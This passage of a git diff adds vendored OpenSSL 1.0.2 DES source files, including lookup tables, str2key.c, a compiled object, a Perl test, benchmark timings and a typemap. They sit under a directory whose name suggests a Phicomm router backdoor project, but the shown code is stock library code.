+                         0x80000040L, 0x80200000L, 0x00202040L, 0x00000000L,
+                         0x00002000L, 0x80000040L, 0x80002040L, 0x80202000L,
+                         0x80200000L, 0x00002040L, 0x00000040L, 0x80200040L,
+                         }, {
+/* nibble 6 */
+                             0x00004000L, 0x00000200L, 0x01000200L,
+                             0x01000004L,
+                             0x01004204L, 0x00004004L, 0x00004200L,
+                             0x00000000L,
+                             0x01000000L, 0x01000204L, 0x00000204L,
+                             0x01004000L,
+                             0x00000004L, 0x01004200L, 0x01004000L,
+                             0x00000204L,
+                             0x01000204L, 0x00004000L, 0x00004004L,
+                             0x01004204L,
+                             0x00000000L, 0x01000200L, 0x01000004L,
+                             0x00004200L,
+                             0x01004004L, 0x00004204L, 0x01004200L,
+                             0x00000004L,
+                             0x00004204L, 0x01004004L, 0x00000200L,
+                             0x01000000L,
+                             0x00004204L, 0x01004000L, 0x01004004L,
+                             0x00000204L,
+                             0x00004000L, 0x00000200L, 0x01000000L,
+                             0x01004004L,
+                             0x01000204L, 0x00004204L, 0x00004200L,
+                             0x00000000L,
+                             0x00000200L, 0x01000004L, 0x00000004L,
+                             0x01000200L,
+                             0x00000000L, 0x01000204L, 0x01000200L,
+                             0x00004200L,
+                             0x00000204L, 0x00004000L, 0x01004204L,
+                             0x01000000L,
+                             0x01004200L, 0x00000004L, 0x00004004L,
+                             0x01004204L,
+                             0x01000004L, 0x01004200L, 0x01004000L,
+                             0x00004004L,
+                             }, {
+/* nibble 7 */
+                                 0x20800080L, 0x20820000L, 0x00020080L,
+                                 0x00000000L,
+                                 0x20020000L, 0x00800080L, 0x20800000L,
+                                 0x20820080L,
+                                 0x00000080L, 0x20000000L, 0x00820000L,
+                                 0x00020080L,
+                                 0x00820080L, 0x20020080L, 0x20000080L,
+                                 0x20800000L,
+                                 0x00020000L, 0x00820080L, 0x00800080L,
+                                 0x20020000L,
+                                 0x20820080L, 0x20000080L, 0x00000000L,
+                                 0x00820000L,
+                                 0x20000000L, 0x00800000L, 0x20020080L,
+                                 0x20800080L,
+                                 0x00800000L, 0x00020000L, 0x20820000L,
+                                 0x00000080L,
+                                 0x00800000L, 0x00020000L, 0x20000080L,
+                                 0x20820080L,
+                                 0x00020080L, 0x20000000L, 0x00000000L,
+                                 0x00820000L,
+                                 0x20800080L, 0x20020080L, 0x20020000L,
+                                 0x00800080L,
+                                 0x20820000L, 0x00000080L, 0x00800080L,
+                                 0x20020000L,
+                                 0x20820080L, 0x00800000L, 0x20800000L,
+                                 0x20000080L,
+                                 0x00820000L, 0x00020080L, 0x20020080L,
+                                 0x20800000L,
+                                 0x00000080L, 0x20820000L, 0x00820080L,
+                                 0x00000000L,
+                                 0x20000000L, 0x20800080L, 0x00020000L,
+                                 0x00820080L,
+                                 }
+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/str2key.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/str2key.c
new file mode 100644
index 0000000..38a478c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/str2key.c
@@ -0,0 +1,164 @@
+/* crypto/des/str2key.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/crypto.h>
+#include "des_locl.h"
+
+void DES_string_to_key(const char *str, DES_cblock *key)
+{
+    DES_key_schedule ks;
+    int i, length;
+    register unsigned char j;
+
+    memset(key, 0, 8);
+    length = strlen(str);
+#ifdef OLD_STR_TO_KEY
+    for (i = 0; i < length; i++)
+        (*key)[i % 8] ^= (str[i] << 1);
+#else                           /* MIT COMPATIBLE */
+    for (i = 0; i < length; i++) {
+        j = str[i];
+        if ((i % 16) < 8)
+            (*key)[i % 8] ^= (j << 1);
+        else {
+            /* Reverse the bit order 05/05/92 eay */
+            j = ((j << 4) & 0xf0) | ((j >> 4) & 0x0f);
+            j = ((j << 2) & 0xcc) | ((j >> 2) & 0x33);
+            j = ((j << 1) & 0xaa) | ((j >> 1) & 0x55);
+            (*key)[7 - (i % 8)] ^= j;
+        }
+    }
+#endif
+    DES_set_odd_parity(key);
+#ifdef EXPERIMENTAL_STR_TO_STRONG_KEY
+    if (DES_is_weak_key(key))
+        (*key)[7] ^= 0xF0;
+    DES_set_key(key, &ks);
+#else
+    DES_set_key_unchecked(key, &ks);
+#endif
+    DES_cbc_cksum((const unsigned char *)str, key, length, &ks, key);
+    OPENSSL_cleanse(&ks, sizeof(ks));
+    DES_set_odd_parity(key);
+}
+
+void DES_string_to_2keys(const char *str, DES_cblock *key1, DES_cblock *key2)
+{
+    DES_key_schedule ks;
+    int i, length;
+    register unsigned char j;
+
+    memset(key1, 0, 8);
+    memset(key2, 0, 8);
+    length = strlen(str);
+#ifdef OLD_STR_TO_KEY
+    if (length <= 8) {
+        for (i = 0; i < length; i++) {
+            (*key2)[i] = (*key1)[i] = (str[i] << 1);
+        }
+    } else {
+        for (i = 0; i < length; i++) {
+            if ((i / 8) & 1)
+                (*key2)[i % 8] ^= (str[i] << 1);
+            else
+                (*key1)[i % 8] ^= (str[i] << 1);
+        }
+    }
+#else                           /* MIT COMPATIBLE */
+    for (i = 0; i < length; i++) {
+        j = str[i];
+        if ((i % 32) < 16) {
+            if ((i % 16) < 8)
+                (*key1)[i % 8] ^= (j << 1);
+            else
+                (*key2)[i % 8] ^= (j << 1);
+        } else {
+            j = ((j << 4) & 0xf0) | ((j >> 4) & 0x0f);
+            j = ((j << 2) & 0xcc) | ((j >> 2) & 0x33);
+            j = ((j << 1) & 0xaa) | ((j >> 1) & 0x55);
+            if ((i % 16) < 8)
+                (*key1)[7 - (i % 8)] ^= j;
+            else
+                (*key2)[7 - (i % 8)] ^= j;
+        }
+    }
+    if (length <= 8)
+        memcpy(key2, key1, 8);
+#endif
+    DES_set_odd_parity(key1);
+    DES_set_odd_parity(key2);
+#ifdef EXPERIMENTAL_STR_TO_STRONG_KEY
+    if (DES_is_weak_key(key1))
+        (*key1)[7] ^= 0xF0;
+    DES_set_key(key1, &ks);
+#else
+    DES_set_key_unchecked(key1, &ks);
+#endif
+    DES_cbc_cksum((const unsigned char *)str, key1, length, &ks, key1);
+#ifdef EXPERIMENTAL_STR_TO_STRONG_KEY
+    if (DES_is_weak_key(key2))
+        (*key2)[7] ^= 0xF0;
+    DES_set_key(key2, &ks);
+#else
+    DES_set_key_unchecked(key2, &ks);
+#endif
+    DES_cbc_cksum((const unsigned char *)str, key2, length, &ks, key2);
+    OPENSSL_cleanse(&ks, sizeof(ks));
+    DES_set_odd_parity(key1);
+    DES_set_odd_parity(key2);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/str2key.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/str2key.o
new file mode 100644
index 0000000000000000000000000000000000000000..8a999ba1ac1918890a3ec722bfca733d5780093d
GIT binary patch
literal 2840
zcmbuBT}&KR6vyv=0J{nUHarlkW@FH-S|+=t#?lzGv)x?=GA%|}t0_2HW~T*#1@|K<
zjiEGS8z*$NFUG#8uci<6&G=x<(wb13#%?t>)hEhBp<qx^q1D>;oSC_B8Fmw+C%Jp?
z{hf2}$N%2Ba3U(joDK(}<{&ST%^szM+^pGbhm2;3)R9{9Tm2J%3UN`JEeSmx`u(`5
z|Isa;{OKHoB*iKBQ+{ZO`a8|<LLDrKGu4>8dLdX6*RPBD*GqzaQ@<;;-JR$Z>OXIM
zQNIydoAKmow7D9`x63Wl^X^b##l2qit^&!|et_A9C8u`lsy5&1y^^opQC!k)o!92$
z-YbEgDk7F<mOqp7!_6L1|9KIkC4Gf9MdiB=eNocyi2918FBtBxCXE;~b|Y}gTyRos
zHFuD$GJ?gEU*pCO_X)j1-z8(~hm5ViD#SbVzfpnTL4of<fU^)+Spady34YK4RFLv-
zm4dTT{TKZkq3!a-VbCE`NAzpjf=9o&Hr)VX+^%sHmUk7F+|zUJ^&8$IfPCXA9HFr2
z)aI{hbFJQDzL69cwfXbfT-;kcRT7o8T(uBz?^$*SBF}>`)5{+V+5^uCPsfzIS=6JT
z%z~7EyV-L<Su=OHq1Xee&H;T+((g(7s-)kRHr-SwLrruWf|?pyf|e}tO_gbaSXo#U
z%+OVMLy#|#_Wk?!`TX(zTq>LMwehWdpe6W1&gcdwb_e*to@Y#qDuB76G(f3>(ta>b
zK;Hr~7ZkKcvm%b;uMo$v2FK3Y8qZm{=zD=bX8HcYI>t5RoiVQIj4Q(VPP-$VU#n{8
z3J&KFoL}I40@oDg8p50hLPJnqgM!wJ9}VQbkGb!;!kjPfj&lApRS_<5y1Ekva0MM)
zK;Zn~3NwQk+1r0`I5+vVwB3VyD))sVr@P&n<ucUS%CP4m#@D#b;Udh(&Ujq}cfH+Q
zhU#1S!_eKqtkcjI*yB*}ob1*Lpd61?;Jp?2n-%!+3VaGUu9L3MI7eV4lTGg)Qpb6P
zM55g?^afK$<?N^ojL7X$S6Gnbu2`%)+9US}VJRw`acWi`O(x~BM0zkgzJVY~&ZU$A
zRT)x~237hMSsBXYMo8Do(SzOHlB^7?iBv`<GEA0GhGb=6NIsGn9JbAmi^>r45v~yo
z?>K6Gzhv5{2*HroLZSRigkZ?)pin-G5DYm7h4SkN!R+JTF|onxp-tmwtSf1czgB_&
z$Z&R@D-37Xd5__2e4X)-Zr|6V3}^TCB*R(Vo~^*c3}^T2vvfeW6=D#)muQsJdqw!n
z_((R<4|O(e)&sPaR)-UORy~#_d@_+u5WYW?A-pm=GNPt{rAD(V4{utFaWAa?(NvBf
zOOKAJX}D&*F@icEA4w-hRC59U^VbLYD7pQG2mwPo#BLh;*6|oV{MiWw??MO)YhU04
z4K`^dJOpiQ(wC(PonTKxL2iH1KD5n?v1s=BcLBpO|7(8G8Z!VjYjpnSSO{%8KdtvM
zj19f`FW27*N%#ue!!KLF#|{c@svpJu(7?6W^A|0E|HrUq&+h|gx%1m={b``O;Q3)L
z&8O#AZf=}!(mIfHmQeT&dduV^v!5Lx(q!GAPq4!n)t#b8piwS=z*_$>4YX=|{y!bj
B4aEQe

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/t/test b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/t/test
new file mode 100644
index 0000000..97acd05
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/t/test
@@ -0,0 +1,27 @@
+#!./perl
+
+BEGIN { push(@INC, qw(../../../lib ../../lib ../lib lib)); }
+
+use DES;
+
+$key='00000000';
+$ks=DES::set_key($key);
+@a=split(//,$ks);
+foreach (@a) { printf "%02x-",ord($_); }
+print "\n";
+
+
+$key=DES::random_key();
+print "($_)\n";
+@a=split(//,$key);
+foreach (@a) { printf "%02x-",ord($_); }
+print "\n";
+$str="this is and again into the breach";
+($k1,$k2)=DES::string_to_2keys($str);
+@a=split(//,$k1);
+foreach (@a) { printf "%02x-",ord($_); }
+print "\n";
+@a=split(//,$k2);
+foreach (@a) { printf "%02x-",ord($_); }
+print "\n";
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/486-50.sol b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/486-50.sol
new file mode 100644
index 0000000..0de62d6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/486-50.sol
@@ -0,0 +1,16 @@
+Solaris 2.4, 486 50mhz, gcc 2.6.3
+options    des ecb/s
+16 r2 i     43552.51 100.0%
+16 r1 i     43487.45  99.9%
+16  c p     43003.23  98.7%
+16 r2 p     42339.00  97.2%
+16  c i     41900.91  96.2%
+16 r1 p     41360.64  95.0%
+ 4  c i     38728.48  88.9%
+ 4  c p     38225.63  87.8%
+ 4 r1 i     38085.79  87.4%
+ 4 r2 i     37825.64  86.9%
+ 4 r2 p     34611.00  79.5%
+ 4 r1 p     31802.00  73.0%
+-DDES_UNROLL -DDES_RISC2
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/586-100.lnx b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/586-100.lnx
new file mode 100644
index 0000000..4323914
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/586-100.lnx
@@ -0,0 +1,20 @@
+Pentium 100
+Linux 2 kernel
+gcc 2.7.0 -O3 -fomit-frame-pointer
+No X server running, just a console, it makes the top speed jump from 151,000
+to 158,000 :-).
+options    des ecb/s
+assember   281000.00 177.1%
+16 r1 p    158667.40 100.0%
+16 r1 i    148471.70  93.6%
+16 r2 p    143961.80  90.7%
+16 r2 i    141689.20  89.3%
+ 4 r1 i    140100.00  88.3%
+ 4 r2 i    134049.40  84.5%
+16  c i    124145.20  78.2%
+16  c p    121584.20  76.6%
+ 4  c i    118116.00  74.4%
+ 4 r2 p    117977.90  74.4%
+ 4  c p    114971.40  72.5%
+ 4 r1 p    114578.40  72.2%
+-DDES_UNROLL -DDES_RISC1 -DDES_PTR
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/686-200.fre b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/686-200.fre
new file mode 100644
index 0000000..7d83f6a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/686-200.fre
@@ -0,0 +1,18 @@
+Pentium 100
+Free BSD 2.1.5 kernel
+gcc 2.7.2.2 -O3 -fomit-frame-pointer
+options    des ecb/s
+assember   578000.00 133.1%
+16 r2 i    434454.80 100.0%
+16 r1 i    433621.43  99.8%
+16 r2 p    431375.69  99.3%
+ 4 r1 i    423722.30  97.5%
+ 4 r2 i    422399.40  97.2%
+16 r1 p    421739.40  97.1%
+16  c i    399027.94  91.8%
+16  c p    372251.70  85.7%
+ 4  c i    365118.35  84.0%
+ 4  c p    352880.51  81.2%
+ 4 r2 p    255104.90  58.7%
+ 4 r1 p    251289.18  57.8%
+-DDES_UNROLL -DDES_RISC2
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/aix.cc b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/aix.cc
new file mode 100644
index 0000000..d96b74e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/aix.cc
@@ -0,0 +1,26 @@
+From: Paco Garcia <pgarcia@cam.es>
+
+This machine is a Bull Estrella  Minitower Model MT604-100
+Processor        : PPC604 
+P.Speed          : 100Mhz 
+Data/Instr Cache :    16 K
+L2 Cache         :   256 K
+PCI BUS Speed    :    33 Mhz
+TransfRate PCI   :   132 MB/s
+Memory           :    96 MB
+
+options    des ecb/s       
+ 4  c p    275118.61 100.0%
+ 4  c i    273545.07  99.4%
+ 4 r2 p    270441.02  98.3%
+ 4 r1 p    253052.15  92.0%
+ 4 r2 i    240842.97  87.5%
+ 4 r1 i    240556.66  87.4%
+16  c i    224603.99  81.6%
+16  c p    224483.98  81.6%
+16 r2 p    215691.19  78.4%
+16 r1 p    208332.83  75.7%
+16 r1 i    199206.50  72.4%
+16 r2 i    198963.70  72.3%
+-DDES_PTR
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/alpha.cc b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/alpha.cc
new file mode 100644
index 0000000..95c17ef
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/alpha.cc
@@ -0,0 +1,18 @@
+cc -O2
+DES_LONG is 'unsigned int'
+
+options    des ecb/s
+ 4 r2 p    181146.14 100.0%
+16 r2 p    172102.94  95.0%
+ 4 r2 i    165424.11  91.3%
+16  c p    160468.64  88.6%
+ 4  c p    156653.59  86.5%
+ 4  c i    155245.18  85.7%
+ 4 r1 p    154729.68  85.4%
+16 r2 i    154137.69  85.1%
+16 r1 p    152357.96  84.1%
+16  c i    148743.91  82.1%
+ 4 r1 i    146695.59  81.0%
+16 r1 i    144961.00  80.0%
+-DDES_RISC2 -DDES_PTR
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/hpux.cc b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/hpux.cc
new file mode 100644
index 0000000..3de856d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/hpux.cc
@@ -0,0 +1,17 @@
+HPUX 10 - 9000/887 - cc -D_HPUX_SOURCE -Aa +ESlit +O2 -Wl,-a,archive
+
+options    des ecb/s
+16  c i    149448.90 100.0%
+ 4  c i    145861.79  97.6%
+16 r2 i    141710.96  94.8%
+16 r1 i    139455.33  93.3%
+ 4 r2 i    138800.00  92.9%
+ 4 r1 i    136692.65  91.5%
+16 r2 p    110228.17  73.8%
+16 r1 p    109397.07  73.2%
+16  c p    109209.89  73.1%
+ 4  c p    108014.71  72.3%
+ 4 r2 p    107873.88  72.2%
+ 4 r1 p    107685.83  72.1%
+-DDES_UNROLL
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/sparc.gcc b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/sparc.gcc
new file mode 100644
index 0000000..8eaa042
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/sparc.gcc
@@ -0,0 +1,17 @@
+solaris 2.5.1 - sparc 10 50mhz - gcc 2.7.2
+
+options    des ecb/s
+16  c i    124382.70 100.0%
+ 4  c i    118884.68  95.6%
+16  c p    112261.20  90.3%
+16 r2 i    111777.10  89.9%
+16 r2 p    108896.30  87.5%
+16 r1 p    108791.59  87.5%
+ 4  c p    107290.10  86.3%
+ 4 r1 p    104583.80  84.1%
+16 r1 i    104206.20  83.8%
+ 4 r2 p    103709.80  83.4%
+ 4 r2 i     98306.43  79.0%
+ 4 r1 i     91525.80  73.6%
+-DDES_UNROLL
+      
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/usparc.cc b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/usparc.cc
new file mode 100644
index 0000000..0864285
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/times/usparc.cc
@@ -0,0 +1,31 @@
+solaris 2.5.1 usparc 167mhz?? - SC4.0 cc -fast -Xa -xO5
+
+For the ultra sparc, SunC 4.0 cc -fast -Xa -xO5, running 'des_opts'
+gives a speed of 475,000 des/s while 'speed' gives 417,000 des/s.
+I believe the difference is tied up in optimisation that the compiler
+is able to perform when the code is 'inlined'.  For 'speed', the DES
+routines are being linked from a library.  I'll record the higher
+speed since if performance is everything, you can always inline
+'des_enc.c'.
+
+[ 16-Jan-06 - I've been playing with the
+  '-xtarget=ultra -xarch=v8plus -Xa -xO5 -Xa'
+  and while it makes the des_opts numbers much slower, it makes the
+  actual 'speed' numbers look better which is a realistic version of
+  using the libraries. ]
+
+options    des ecb/s
+16 r1 p    475516.90 100.0%
+16 r2 p    439388.10  92.4%
+16  c i    427001.40  89.8%
+16  c p    419516.50  88.2%
+ 4 r2 p    409491.70  86.1%
+ 4 r1 p    404266.90  85.0%
+ 4  c p    398121.00  83.7%
+ 4  c i    370588.40  77.9%
+ 4 r1 i    362742.20  76.3%
+16 r2 i    331275.50  69.7%
+16 r1 i    324730.60  68.3%
+ 4 r2 i     63535.10  13.4%	<-- very very weird, must be cache problems.
+-DDES_UNROLL -DDES_RISC1 -DDES_PTR
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/typemap b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/typemap
new file mode 100644
index 0000000..a524f53
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/typemap
@@ -0,0 +1,34 @@
+#
+# DES SECTION
+#
+deschar *	T_DESCHARP
+des_cblock *	T_CBLOCK
+des_cblock	T_CBLOCK
+des_key_schedule	T_SCHEDULE
+des_key_schedule *	T_SCHEDULE
+
+INPUT
+T_CBLOCK
+	$var=(des_cblock *)SvPV($arg,len);
+	if (len < DES_KEY_SZ)
+		{
+		croak(\"$var needs to be at least %u bytes long\",DES_KEY_SZ);
+		}
+
+T_SCHEDULE
+	$var=(des_key_schedule *)SvPV($arg,len);
+	if (len < DES_SCHEDULE_SZ)
+		{
+		croak(\"$var needs to be at least %u bytes long\",
+			DES_SCHEDULE_SZ);
+		}
+
+OUTPUT
+T_CBLOCK
+	sv_setpvn($arg,(char *)$var,DES_KEY_SZ);
+
+T_SCHEDULE
+	sv_setpvn($arg,(char *)$var,DES_SCHEDULE_SZ);
+
+T_DESCHARP
+	sv_setpvn($arg,(char *)$var,len);
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/xcbc_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/xcbc_enc.c
new file mode 100644
index 0000000..6fe021b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/xcbc_enc.c
@@ -0,0 +1,216 @@
+/* crypto/des/xcbc_enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include "des_locl.h"
+
+/* RSA's DESX */
+
+#if 0                           /* broken code, preserved just in case anyone
+                                 * specifically looks for this */
+static const unsigned char desx_white_in2out[256] = {
+    0xBD, 0x56, 0xEA, 0xF2, 0xA2, 0xF1, 0xAC, 0x2A, 0xB0, 0x93, 0xD1, 0x9C,
+    0x1B, 0x33, 0xFD, 0xD0,
+    0x30, 0x04, 0xB6, 0xDC, 0x7D, 0xDF, 0x32, 0x4B, 0xF7, 0xCB, 0x45, 0x9B,
+    0x31, 0xBB, 0x21, 0x5A,
+    0x41, 0x9F, 0xE1, 0xD9, 0x4A, 0x4D, 0x9E, 0xDA, 0xA0, 0x68, 0x2C, 0xC3,
+    0x27, 0x5F, 0x80, 0x36,
+    0x3E, 0xEE, 0xFB, 0x95, 0x1A, 0xFE, 0xCE, 0xA8, 0x34, 0xA9, 0x13, 0xF0,
+    0xA6, 0x3F, 0xD8, 0x0C,
+    0x78, 0x24, 0xAF, 0x23, 0x52, 0xC1, 0x67, 0x17, 0xF5, 0x66, 0x90, 0xE7,
+    0xE8, 0x07, 0xB8, 0x60,
+    0x48, 0xE6, 0x1E, 0x53, 0xF3, 0x92, 0xA4, 0x72, 0x8C, 0x08, 0x15, 0x6E,
+    0x86, 0x00, 0x84, 0xFA,
+    0xF4, 0x7F, 0x8A, 0x42, 0x19, 0xF6, 0xDB, 0xCD, 0x14, 0x8D, 0x50, 0x12,
+    0xBA, 0x3C, 0x06, 0x4E,
+    0xEC, 0xB3, 0x35, 0x11, 0xA1, 0x88, 0x8E, 0x2B, 0x94, 0x99, 0xB7, 0x71,
+    0x74, 0xD3, 0xE4, 0xBF,
+    0x3A, 0xDE, 0x96, 0x0E, 0xBC, 0x0A, 0xED, 0x77, 0xFC, 0x37, 0x6B, 0x03,
+    0x79, 0x89, 0x62, 0xC6,
+    0xD7, 0xC0, 0xD2, 0x7C, 0x6A, 0x8B, 0x22, 0xA3, 0x5B, 0x05, 0x5D, 0x02,
+    0x75, 0xD5, 0x61, 0xE3,
+    0x18, 0x8F, 0x55, 0x51, 0xAD, 0x1F, 0x0B, 0x5E, 0x85, 0xE5, 0xC2, 0x57,
+    0x63, 0xCA, 0x3D, 0x6C,
+    0xB4, 0xC5, 0xCC, 0x70, 0xB2, 0x91, 0x59, 0x0D, 0x47, 0x20, 0xC8, 0x4F,
+    0x58, 0xE0, 0x01, 0xE2,
